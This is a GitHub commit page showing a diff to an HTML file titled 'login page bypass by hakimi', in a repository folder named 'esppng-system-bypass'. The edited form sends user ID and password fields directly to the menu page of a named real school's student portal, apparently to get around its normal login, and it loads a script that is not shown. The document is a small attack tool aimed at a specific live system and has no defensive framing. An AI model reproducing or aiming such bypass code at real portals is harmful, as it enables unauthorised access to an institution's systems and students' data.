Skip to content

Commit

Permalink
Fixup
Browse files Browse the repository at this point in the history
  • Loading branch information
hakimifr committed Nov 24, 2023
1 parent bba380c commit 73f62e7
Showing 1 changed file with 11 additions and 8 deletions.
19 changes: 11 additions & 8 deletions esppng-system-bypass/index.html
Original file line number Diff line number Diff line change
Expand Up @@ -6,15 +6,18 @@
<title>login page bypass by hakimi</title>
</head>
<body>
<form id="credentials-form" action="https://mrsmkualaklawang.edu.my/epelajar/MenuUtama.asp">
<label for="txtNoMak">No. Maktab:</label>
<input type="text" id="txtNoMak" name="txtNoMak"><br><br>
<form action="https://mrsmkualaklawang.edu.my/epelajar/MenuUtama.asp" class="imgcontainer" method="POST">
<label for="uname"><b>ID Pengguna</b></label>
<input name="txtNoMak" type="text" required id="txtNoMak" placeholder="Masukkan ID Pengguna">

<label for="txtPwd">No. KP:</label>
<input type="password" id="txtPwd" name="txtPwd" required><br><br>

<input type="submit" name="Submit">
<label for="psw"><b>Katalaluan</b></label>
<input type="password" placeholder="Masukkan Katalaluan" name="txtPwd" required>

<button class="button11 button111" type="submit">LOG MASUK</button>
<label>

</label>
</form>
</body>
<script src="index.js"></script>
</html>
</html>

0 comments on commit 73f62e7

Please sign in to comment.